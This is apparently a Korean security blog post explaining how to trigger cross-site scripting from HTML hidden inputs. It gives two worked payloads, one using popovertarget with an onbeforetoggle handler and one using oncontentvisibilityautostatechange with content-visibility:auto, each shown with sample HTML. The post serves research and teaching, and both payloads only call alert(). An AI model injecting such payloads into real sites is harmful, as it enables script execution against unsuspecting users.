Hidden XSS

 
https://www.hahwul.com/2016/06/20/web-hacking-hiddenxss-xss-in-hidden/

HIDDEN:XSS - input type=hidden 에서의 XSS

 
https://portswigger.net/research/exploiting-xss-in-hidden-inputs-and-meta-tags?pk_source=portswiggerres&pk_medium=social&pk_campaign=psres

Exploiting XSS in hidden inputs and meta tags

 

 
https://blog.theori.io/security-threats-caused-by-development-side-effects-1c2af4548482 

개발 사이드 이펙트로 발생한 보안 위협 사례

 

XSS 공격에는 여러가지 방법이 있지만 hidden type 내에서 eventhandler가 동작할 수 없다고만 생각했다.
하지만 최근 hidden type 내에서도 공격할 수 있는 방법이 있다고 하여 정리해본다.
hidden bypass XSS 공격에 대한 상세한 이해는 위의 두 블로그를 통해 상세히 알아볼 수 있다.
 
 
 
 

1. popovertarget Attribute

---

 
popovertarget 이라는 속성을 통해 XSS를 동작시킬 수 있는데 간단한 예시코드를 만들어보았다.

 
 

<!DOCTYPE html>

<html>
<center>
 XSS Episode.2
 
 <br><br><br>
 
<button popovertarget=x>Click me</button>
<input type="hidden" value="y">
 
 <input type="text" name="search" maxlength="100" value="Y">
 <input type="submit" value = "검색">
 
 </center>
 
 </form>
 
 </body>
 
 </html>

 
 
현재 input tag는 hidden type을 가지고 있으며 y 라는 value 값을 부여했다.
이제 value에 '(quote), "(double quote) 에 대한 특수문자 필터가 없다는 가정 하에 value 값 내부에
아래와 같이 eventhandler 구문을 삽입해보았다.
 

<input type="hidden" value="yy" popover id=x onbeforetoggle="alert(`JNU Hi 1...!`)" <button popovertarget=x>click me</button><img src="x

 
위와 같은 구문을 삽입한 후 popover의 id 값이 선언된 button tag에서 eventhandler가 동작하는 것을 볼 수 있다.
 

 
 
 
 

2. oncontentvisibilityautostatechange eventhandler

---

해당 eventhandler는 어떻게 동작할지 궁금해서 한번 시도해봤다.
위와 같은 전제로 value 값에 다음과 같이 해당 eventhandler를 삽입해보았다.
참고로 해당 eventhandler는 content-visibility:auto 일 때 동작한다...!
간단히 말해 html 랜더링 시 동작되는 eventhandler다.
 

<!DOCTYPE html>

<html>
<center>
 XSS Episode.2
 
 <br><br><br>
 
<button popovertarget=x>Click me</button>
<input type="hidden" value= "y" oncontentvisibilityautostatechange="alert(`JNU hello`)" style="content-visibility:auto">
 
 <input type="text" name="search" maxlength="100" value="Y">
 <input type="submit" value = "검색">
 
 </center>
 
 </form>
 
 </body>
 
 </html>